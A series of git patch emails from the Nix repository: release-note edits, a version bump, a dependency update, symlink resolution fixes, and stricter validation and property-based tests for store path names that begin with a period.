[#9673](https://github.com/NixOS/nix/pull/9673) - - Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. + Nix now also reports cgroup statistics when building through the Nix daemon and when doing remote builds using `ssh-ng`, + if both sides of the connection are using Nix 2.20 or newer. - Disallow empty search regex in `nix search` [#9481](https://github.com/NixOS/nix/pull/9481) [`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. -- Reduce eval memory usage and wall time [#9658](https://github.com/NixOS/nix/pull/9658) - - Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. - This reduces memory usage during eval by around 2% and wall time by around 3%. - - Add new `eval-system` setting [#4093](https://github.com/NixOS/nix/pull/4093) Add a new `eval-system` option. Unlike `system`, it just overrides the value of `builtins.currentSystem`. This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. - In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. + In contrast, `system` also affects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. `eval-system` only takes effect if it is non-empty. If empty (the default) `system` is used as before, so there is no breakage. 
-- Nix now uses `libgit2` for Git fetching [#5313](https://github.com/NixOS/nix/issues/5313) [#9240](https://github.com/NixOS/nix/pull/9240) [#9241](https://github.com/NixOS/nix/pull/9241) [#9258](https://github.com/NixOS/nix/pull/9258) [#9480](https://github.com/NixOS/nix/pull/9480) - - Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. - The existing implementation based on the Git CLI had issues regarding reproducibility and performance. - - Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. - - Known issues: - - The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. - -- Rename hash format `base32` to `nix32` [#9452](https://github.com/NixOS/nix/pull/9452) - - Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for - [Base32](https://en.wikipedia.org/wiki/Base32). - - ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` - - For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` - parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value - remains as a deprecated alias for `"base32"`. 
Please convert your code from: - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} - ``` - - to - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} - ``` - -- import-from-derivation builds the derivation in the build store [#9661](https://github.com/NixOS/nix/pull/9661) +- Import-from-derivation builds the derivation in the build store [#9661](https://github.com/NixOS/nix/pull/9661) When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. the store specified in the `store` Nix option. - Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. + Because the resulting Nix expression must be copied back to the evaluation store in order to be imported, this requires the evaluation store to trust the build store's signatures. - Mounted SSH Store [#7890](https://github.com/NixOS/nix/issues/7890) [#7912](https://github.com/NixOS/nix/pull/7912) Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. -- Rename to `nix config show` [#7672](https://github.com/NixOS/nix/issues/7672) [#9477](https://github.com/NixOS/nix/pull/9477) +- Rename `nix show-config` to `nix config show` [#7672](https://github.com/NixOS/nix/issues/7672) [#9477](https://github.com/NixOS/nix/pull/9477) - `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. + `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command line interface. 
-- Fix `nix-env --query --drv-path --json` [#9257](https://github.com/NixOS/nix/pull/9257) +- Add command `nix hash convert` [#9452](https://github.com/NixOS/nix/pull/9452) - Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. - -- Some stack overflow segfaults are fixed [#8882](https://github.com/NixOS/nix/issues/8882) [#8893](https://github.com/NixOS/nix/pull/8893) - - `nix flake check` now logs the checks it runs and the derivations it evaluates: - - ``` - $ nix flake check -v - evaluating flake... - checking flake output 'checks'... - checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... - derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... - derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... - derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... - derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv - checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... - derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv - checking flake output 'packages'... - checking derivation 'packages.aarch64-darwin.default'... - derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv - checking flake output 'apps'... - checking flake output 'devShells'... - checking derivation 'devShells.aarch64-darwin.default'... - derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv - running 5 flake checks... - warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux - Use '--all-systems' to check all. 
- ``` - -- Add `nix hash convert` [#9452](https://github.com/NixOS/nix/pull/9452) - - New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track - to stabilization! Examples: - - - Convert the hash to `nix32`. - - ```bash - $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" - vw46m23bizj4n8afrc0fj19wrp7mj3c0 - ``` - `nix32` is a base32 encoding with a nix-specific character set. - Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input - hash. - - Convert the hash to the `sri` format that includes an algorithm specification: - ```bash - nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` - or with an explicit `-to` format: - ```bash - nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` - - Assert the input format of the hash: - ```bash - nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" - error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' - nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" - sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= - ``` - - The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. - - ## Related Deprecations - - The following commands are still available but will emit a deprecation warning. Please convert your code to - `nix hash convert`: + This replaces the old `nix hash to-*` commands, which are still available but will emit a deprecation warning. Please convert as follows: - `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. - `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. 
- `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. - - `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` - or even just `nix hash convert $hash1 $hash2` instead. + - `nix hash to-sri $hash1 $hash2`: Use `nix hash convert --to sri $hash1 $hash2` or even just `nix hash convert $hash1 $hash2` instead. -- `nix profile` now allows referring to elements by human-readable name [#8678](https://github.com/NixOS/nix/pull/8678) +- Rename hash format `base32` to `nix32` [#9452](https://github.com/NixOS/nix/pull/9452) + + Hash format `base32` was renamed to `nix32` since it used a special Nix-specific character set for + [Base32](https://en.wikipedia.org/wiki/Base32). + +- `nix profile` now allows referring to elements by human-readable names [#8678](https://github.com/NixOS/nix/pull/8678) [`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Profile element names are generated when a package is installed and remain the same until the package is removed. **Warning**: The `manifest.nix` file used to record the contents of profiles has changed. Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. -- Rename hash format `base32` to `nix32` [#8678](https://github.com/NixOS/nix/pull/8678) - - Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for - [Base32](https://en.wikipedia.org/wiki/Base32). 
- - ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` - - For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` - parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value - remains as a deprecated alias for `"base32"`. Please convert your code from: - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} - ``` - - to - - ```nix - builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} - ``` - - Give `nix store add` a `--hash-algo` flag [#9809](https://github.com/NixOS/nix/pull/9809) Adds a missing feature that was present in the old CLI, and matches our @@ -202,17 +72,17 @@ Before: ``` - error: cannot coerce a set to a string + error: cannot coerce a set to a string ``` After: ``` - error: cannot coerce a set to a string: { aesSupport = «thunk»; - avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; - canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion - = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 - attributes elided»} + error: cannot coerce a set to a string: { aesSupport = «thunk»; + avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; + canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion + = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 + attributes elided»} ``` - Type errors include the failing value @@ -223,16 +93,16 @@ Before: ``` - error: value is a set while a string was expected + error: value is a set while a string was expected ``` After: ``` - error: expected a string but found a set: { ghc810 = «thunk»; - ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; - ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; - ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} + 
error: expected a string but found a set: { ghc810 = «thunk»; + ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; + ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; + ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} ``` - Source locations are printed more consistently in errors [#561](https://github.com/NixOS/nix/issues/561) [#9555](https://github.com/NixOS/nix/pull/9555) @@ -281,45 +151,11 @@ can be set with [the `max-call-depth` option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). - This fixes segfaults or the following unhelpful error message in many cases: - - error: stack overflow (possible infinite recursion) - - Before: - - ``` - $ nix-instantiate --eval --expr '(x: x x) (x: x x)' - Segmentation fault: 11 - ``` - - After: - - ``` - $ nix-instantiate --eval --expr '(x: x x) (x: x x)' - error: stack overflow - - at «string»:1:14: - 1| (x: x x) (x: x x) - | ^ - ``` + This replaces the `stack overflow (possible infinite recursion)` message. - Better error reporting for `with` expressions [#9658](https://github.com/NixOS/nix/pull/9658) - `with` expressions using non-attrset values to resolve variables are now reported with proper positions. - - Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: - - ``` - nix-repl> with 1; a - error: - … - - at «none»:0: (source not available) - - error: value is an integer while a set was expected - ``` - - Now position information is preserved and reported as with most other errors: + `with` expressions using non-attrset values to resolve variables are now reported with proper positions, e.g. 
``` nix-repl> with 1; a @@ -331,4 +167,3 @@ error: expected a set but found an integer ``` - From 2f3fb6c12e91907b91be88e69a5a430ee3d86642 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 22:57:25 +0100 Subject: [PATCH 364/654] Bump version --- .version | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.version b/.version index 7329e21c3..db65e2167 100644 --- a/.version +++ b/.version @@ -1 +1 @@ -2.20.0 +2.21.0 From a3aae7beefb675ea8c27f07284995d4f06f9952c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 29 Jan 2024 22:14:10 +0000 Subject: [PATCH 365/654] build(deps): bump zeebe-io/backport-action from 2.4.0 to 2.4.1 Bumps [zeebe-io/backport-action](https://github.com/zeebe-io/backport-action) from 2.4.0 to 2.4.1. - [Release notes](https://github.com/zeebe-io/backport-action/releases) - [Commits](https://github.com/zeebe-io/backport-action/compare/v2.4.0...v2.4.1) --- updated-dependencies: - dependency-name: zeebe-io/backport-action dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- .github/workflows/backport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/backport.yml b/.github/workflows/backport.yml index 46a4529c1..5b75704b5 100644 --- a/.github/workflows/backport.yml +++ b/.github/workflows/backport.yml @@ -21,7 +21,7 @@ jobs: fetch-depth: 0 - name: Create backport PRs # should be kept in sync with `version` - uses: zeebe-io/backport-action@v2.4.0 + uses: zeebe-io/backport-action@v2.4.1 with: # Config README: https://github.com/zeebe-io/backport-action#backport-action github_token: ${{ secrets.GITHUB_TOKEN }} From b36ff47e7c38de2eebe4934c27f5594babcebe1b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 30 Jan 2024 15:00:18 +0100 Subject: [PATCH 366/654] Resolve symlinks in a few more places Fixes #9882. 
--- src/libexpr/eval.cc | 2 +- src/libexpr/primops.cc | 2 +- tests/functional/nix-channel.sh | 5 ++++- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index b60cdcf55..91fd3ddf8 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2338,7 +2338,7 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat auto dstPath = i != srcToStore.end() ? i->second : [&]() { - auto dstPath = fetchToStore(*store, path, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); + auto dstPath = fetchToStore(*store, path.resolveSymlinks(), path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); allowPath(dstPath); srcToStore.insert_or_assign(path, dstPath); printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath)); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 993ecceb2..cdd9a3a09 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -2241,7 +2241,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = fetchToStore(*state.store, path, name, method, filter.get(), state.repair); + auto dstPath = fetchToStore(*state.store, path.resolveSymlinks(), name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); diff --git a/tests/functional/nix-channel.sh b/tests/functional/nix-channel.sh index b5d935004..ca5df3bdd 100644 --- a/tests/functional/nix-channel.sh +++ b/tests/functional/nix-channel.sh @@ -29,7 +29,8 @@ unset NIX_CONFIG # Create a channel. 
rm -rf $TEST_ROOT/foo mkdir -p $TEST_ROOT/foo -nix copy --to file://$TEST_ROOT/foo?compression="bzip2" $(nix-store -r $(nix-instantiate dependencies.nix)) +drvPath=$(nix-instantiate dependencies.nix) +nix copy --to file://$TEST_ROOT/foo?compression="bzip2" $(nix-store -r "$drvPath") rm -rf $TEST_ROOT/nixexprs mkdir -p $TEST_ROOT/nixexprs cp config.nix dependencies.nix dependencies.builder*.sh $TEST_ROOT/nixexprs/ @@ -64,3 +65,5 @@ grepQuiet 'item.*attrPath="foo".*name="dependencies-top"' $TEST_ROOT/meta.xml nix-env -i dependencies-top [ -e $TEST_HOME/.nix-profile/foobar ] +# Test evaluation through a channel symlink (#9882). +nix-instantiate '' From caea7dcb7e8fe75ef94635e15f49283668e60965 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 31 Jan 2024 11:43:27 -0500 Subject: [PATCH 367/654] Change an `allowPath` call to take a store path again This looks like a revert of #5844, but is not. That one was needed because https://github.com/NixOS/nix/commit/d90f9d4b9994dc1f15b9d664ae313f06261d6058#diff-0f59bb6f197822ef9f19ceae9624989499d170c84dfdc1f486a8959bb4588cafR85 changed the type of the argument to `allowPath` from a `StorePath` to a `Path`. But since https://github.com/NixOS/nix/commit/caabc4f64889d5a4c47d6102b3aa1d3c80bbc107#diff-0f59bb6f197822ef9f19ceae9624989499d170c84dfdc1f486a8959bb4588cafL100-R92, it is a `StorePath` again. I think this is worth changing because we want to be very careful about `toRealPath` and the evaluator --- ideally the choice of real path does not affect evaluation at all. So using it fewer times is better. --- src/libexpr/primops.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index cdd9a3a09..1197b6e13 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -112,7 +112,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context) for (auto & outputPath : outputsToCopyAndAllow) { /* Add the output of this derivations to the allowed paths. 
*/ - allowPath(store->toRealPath(outputPath)); + allowPath(outputPath); } return res; From b13e6a76b4f289c6db69ffaa7bd35b7e44f2a391 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 27 Jan 2024 11:19:05 +0100 Subject: [PATCH 368/654] parseStorePath: Support leading period --- doc/manual/rl-next/leading-period.md | 10 ++++++++++ tests/unit/libstore/path.cc | 1 + 2 files changed, 11 insertions(+) create mode 100644 doc/manual/rl-next/leading-period.md diff --git a/doc/manual/rl-next/leading-period.md b/doc/manual/rl-next/leading-period.md new file mode 100644 index 000000000..e9a32a74a --- /dev/null +++ b/doc/manual/rl-next/leading-period.md @@ -0,0 +1,10 @@ +--- +synopsis: Store paths are allowed to start with `.` +issues: 912 +prs: 9867 9091 9095 9120 9121 9122 9130 9219 9224 +--- + +Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties. +From now on, leading periods are officially, definitively supported. + +Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286). diff --git a/tests/unit/libstore/path.cc b/tests/unit/libstore/path.cc index 5485ab8bb..f7b69d5f9 100644 --- a/tests/unit/libstore/path.cc +++ b/tests/unit/libstore/path.cc @@ -62,6 +62,7 @@ TEST_DO_PARSE(underscore, "foo_bar") TEST_DO_PARSE(period, "foo.txt") TEST_DO_PARSE(question_mark, "foo?why") TEST_DO_PARSE(equals_sign, "foo=foo") +TEST_DO_PARSE(dotfile, ".gitignore") #undef TEST_DO_PARSE From 69bbd5852af9b2f0b794162bd1debcdf64fc6648 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 30 Jan 2024 18:18:27 +0100 Subject: [PATCH 369/654] test: Generate distinct path names Gen::just is the constant generator. Don't just return that! 
--- tests/unit/libstore-support/tests/path.cc | 72 ++++++++++++----------- 1 file changed, 37 insertions(+), 35 deletions(-) diff --git a/tests/unit/libstore-support/tests/path.cc b/tests/unit/libstore-support/tests/path.cc index bbe43bad4..8ddda8027 100644 --- a/tests/unit/libstore-support/tests/path.cc +++ b/tests/unit/libstore-support/tests/path.cc @@ -1,3 +1,4 @@ +#include #include #include @@ -20,59 +21,60 @@ void showValue(const StorePath & p, std::ostream & os) namespace rc { using namespace nix; -Gen Arbitrary::arbitrary() +Gen storePathChar() { - auto len = *gen::inRange( - 1, - StorePath::MaxPathLen - StorePath::HashLen); - - std::string pre; - pre.reserve(len); - - for (size_t c = 0; c < len; ++c) { - switch (auto i = *gen::inRange(0, 10 + 2 * 26 + 6)) { + return rc::gen::apply([](uint8_t i) -> char { + switch (i) { case 0 ... 9: - pre += '0' + i; + return '0' + i; case 10 ... 35: - pre += 'A' + (i - 10); - break; + return 'A' + (i - 10); case 36 ... 61: - pre += 'a' + (i - 36); - break; + return 'a' + (i - 36); case 62: - pre += '+'; - break; + return '+'; case 63: - pre += '-'; - break; + return '-'; case 64: - pre += '.'; - break; + return '.'; case 65: - pre += '_'; - break; + return '_'; case 66: - pre += '?'; - break; + return '?'; case 67: - pre += '='; - break; + return '='; default: assert(false); } - } + }, + gen::inRange(0, 10 + 2 * 26 + 6)); +} - return gen::just(StorePathName { - .name = std::move(pre), - }); +Gen Arbitrary::arbitrary() +{ + return gen::construct( + gen::suchThat( + gen::container(storePathChar()), + [](const std::string & s) { + return + !( s == "" + || s == "." + || s == ".." 
+ || s.starts_with(".-") + || s.starts_with("..-") + ); + } + ) + ); } Gen Arbitrary::arbitrary() { - return gen::just(StorePath { - *gen::arbitrary(), - (*gen::arbitrary()).name, - }); + return + gen::construct( + gen::arbitrary(), + gen::apply([](StorePathName n){ return n.name; }, gen::arbitrary()) + ); } } // namespace rc From 8406da28773f050e00a006e4812e3ecbf919a2a9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 30 Jan 2024 18:31:28 +0100 Subject: [PATCH 370/654] test: Generate distinct hashes Gen::just is the constant generator. Don't just return that! --- tests/unit/libutil-support/tests/hash.cc | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/tests/unit/libutil-support/tests/hash.cc b/tests/unit/libutil-support/tests/hash.cc index 50889cd33..51b9663b4 100644 --- a/tests/unit/libutil-support/tests/hash.cc +++ b/tests/unit/libutil-support/tests/hash.cc @@ -11,10 +11,17 @@ using namespace nix; Gen Arbitrary::arbitrary() { - Hash hash(HashAlgorithm::SHA1); - for (size_t i = 0; i < hash.hashSize; ++i) - hash.hash[i] = *gen::arbitrary(); - return gen::just(hash); + Hash prototype(HashAlgorithm::SHA1); + return + gen::apply( + [](const std::vector & v) { + Hash hash(HashAlgorithm::SHA1); + assert(v.size() == hash.hashSize); + std::copy(v.begin(), v.end(), hash.hash); + return hash; + }, + gen::container>(prototype.hashSize, gen::arbitrary()) + ); } } From f1b4663805a9dbcb1ace64ec110092d17c9155e0 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 30 Jan 2024 18:37:23 +0100 Subject: [PATCH 371/654] Disallow store path names that are . or .. (plus opt. -) As discussed in the maintainer meeting on 2024-01-29. Mainly this is to avoid a situation where the name is parsed and treated as a file name, mostly to protect users. .-* and ..-* are also considered invalid because they might strip on that separator to remove versions. 
Doesn't really work, but that's what we decided, and I won't argue with it, because .-* probably doesn't seem to have a real world application anyway. We do still permit a 1-character name that's just "-", which still poses a similar risk in such a situation. We can't start disallowing trailing -, because a non-zero number of users will need it and we've seen how annoying and painful such a change is. What matters most is preventing a situation where . or .. can be injected, and to just get this done. --- doc/manual/rl-next/leading-period.md | 2 +- src/libstore/path-regex.hh | 7 ++- src/libstore/path.cc | 13 ++++++ tests/unit/libstore/path.cc | 68 ++++++++++++++++++++++++++++ 4 files changed, 88 insertions(+), 2 deletions(-) diff --git a/doc/manual/rl-next/leading-period.md b/doc/manual/rl-next/leading-period.md index e9a32a74a..ef7c2326f 100644 --- a/doc/manual/rl-next/leading-period.md +++ b/doc/manual/rl-next/leading-period.md @@ -5,6 +5,6 @@ prs: 9867 9091 9095 9120 9121 9122 9130 9219 9224 --- Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties. -From now on, leading periods are officially, definitively supported. +From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`. Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286). 
diff --git a/src/libstore/path-regex.hh b/src/libstore/path-regex.hh index 4f8dc4c1f..56c2cfc1d 100644 --- a/src/libstore/path-regex.hh +++ b/src/libstore/path-regex.hh @@ -3,6 +3,11 @@ namespace nix { -static constexpr std::string_view nameRegexStr = R"([0-9a-zA-Z\+\-\._\?=]+)"; + +static constexpr std::string_view nameRegexStr = + // This uses a negative lookahead: (?!\.\.?(-|$)) + // - deny ".", "..", or those strings followed by '-' + // - when it's not those, start again at the start of the input and apply the next regex, which is [0-9a-zA-Z\+\-\._\?=]+ + R"((?!\.\.?(-|$))[0-9a-zA-Z\+\-\._\?=]+)"; } diff --git a/src/libstore/path.cc b/src/libstore/path.cc index 4361b3194..5db4b974c 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -10,6 +10,19 @@ static void checkName(std::string_view path, std::string_view name) throw BadStorePath("store path '%s' has a name longer than %d characters", path, StorePath::MaxPathLen); // See nameRegexStr for the definition + if (name[0] == '.') { + // check against "." 
and "..", followed by end or dash + if (name.size() == 1) + throw BadStorePath("store path '%s' has invalid name '%s'", path, name); + if (name[1] == '-') + throw BadStorePath("store path '%s' has invalid name '%s': first dash-separated component must not be '%s'", path, name, "."); + if (name[1] == '.') { + if (name.size() == 2) + throw BadStorePath("store path '%s' has invalid name '%s'", path, name); + if (name[2] == '-') + throw BadStorePath("store path '%s' has invalid name '%s': first dash-separated component must not be '%s'", path, name, ".."); + } + } for (auto c : name) if (!((c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') diff --git a/tests/unit/libstore/path.cc b/tests/unit/libstore/path.cc index f7b69d5f9..213b6e95f 100644 --- a/tests/unit/libstore/path.cc +++ b/tests/unit/libstore/path.cc @@ -39,6 +39,12 @@ TEST_DONT_PARSE(double_star, "**") TEST_DONT_PARSE(star_first, "*,foo") TEST_DONT_PARSE(star_second, "foo,*") TEST_DONT_PARSE(bang, "foo!o") +TEST_DONT_PARSE(dot, ".") +TEST_DONT_PARSE(dot_dot, "..") +TEST_DONT_PARSE(dot_dot_dash, "..-1") +TEST_DONT_PARSE(dot_dash, ".-1") +TEST_DONT_PARSE(dot_dot_dash_a, "..-a") +TEST_DONT_PARSE(dot_dash_a, ".-a") #undef TEST_DONT_PARSE @@ -63,6 +69,10 @@ TEST_DO_PARSE(period, "foo.txt") TEST_DO_PARSE(question_mark, "foo?why") TEST_DO_PARSE(equals_sign, "foo=foo") TEST_DO_PARSE(dotfile, ".gitignore") +TEST_DO_PARSE(triple_dot_a, "...a") +TEST_DO_PARSE(triple_dot_1, "...1") +TEST_DO_PARSE(triple_dot_dash, "...-") +TEST_DO_PARSE(triple_dot, "...") #undef TEST_DO_PARSE @@ -84,6 +94,64 @@ RC_GTEST_FIXTURE_PROP( RC_ASSERT(p == store->parseStorePath(store->printStorePath(p))); } + +RC_GTEST_FIXTURE_PROP( + StorePathTest, + prop_check_regex_eq_parse, + ()) +{ + static auto nameFuzzer = + rc::gen::container( + rc::gen::oneOf( + // alphanum, repeated to weigh heavier + rc::gen::oneOf( + rc::gen::inRange('0', '9'), + rc::gen::inRange('a', 'z'), + rc::gen::inRange('A', 'Z') + ), + // valid symbols + rc::gen::oneOf( + 
rc::gen::just('+'), + rc::gen::just('-'), + rc::gen::just('.'), + rc::gen::just('_'), + rc::gen::just('?'), + rc::gen::just('=') + ), + // symbols for scary .- and ..- cases, repeated for weight + rc::gen::just('.'), rc::gen::just('.'), + rc::gen::just('.'), rc::gen::just('.'), + rc::gen::just('-'), rc::gen::just('-'), + // ascii symbol ranges + rc::gen::oneOf( + rc::gen::inRange(' ', '/'), + rc::gen::inRange(':', '@'), + rc::gen::inRange('[', '`'), + rc::gen::inRange('{', '~') + ), + // typical whitespace + rc::gen::oneOf( + rc::gen::just(' '), + rc::gen::just('\t'), + rc::gen::just('\n'), + rc::gen::just('\r') + ), + // some chance of control codes, non-ascii or other garbage we missed + rc::gen::inRange('\0', '\xff') + )); + + auto name = *nameFuzzer; + + std::string path = store->storeDir + "/575s52sh487i0ylmbs9pvi606ljdszr0-" + name; + bool parsed = false; + try { + store->parseStorePath(path); + parsed = true; + } catch (const BadStorePath &) { + } + RC_ASSERT(parsed == std::regex_match(std::string { name }, nameRegex)); +} + #endif } From 0f2e9e6bd2b62b15babe608fbd18eccfc0215d06 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 1 Feb 2024 01:01:04 +0100 Subject: [PATCH 372/654] Typo --- src/libstore/build/worker.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/worker.hh b/src/libstore/build/worker.hh index 23ad87914..ced013ddd 100644 --- a/src/libstore/build/worker.hh +++ b/src/libstore/build/worker.hh @@ -116,7 +116,7 @@ private: WeakGoals waitingForAWhile; /** - * Last time the goals in `waitingForAWhile` where woken up. + * Last time the goals in `waitingForAWhile` were woken up. 
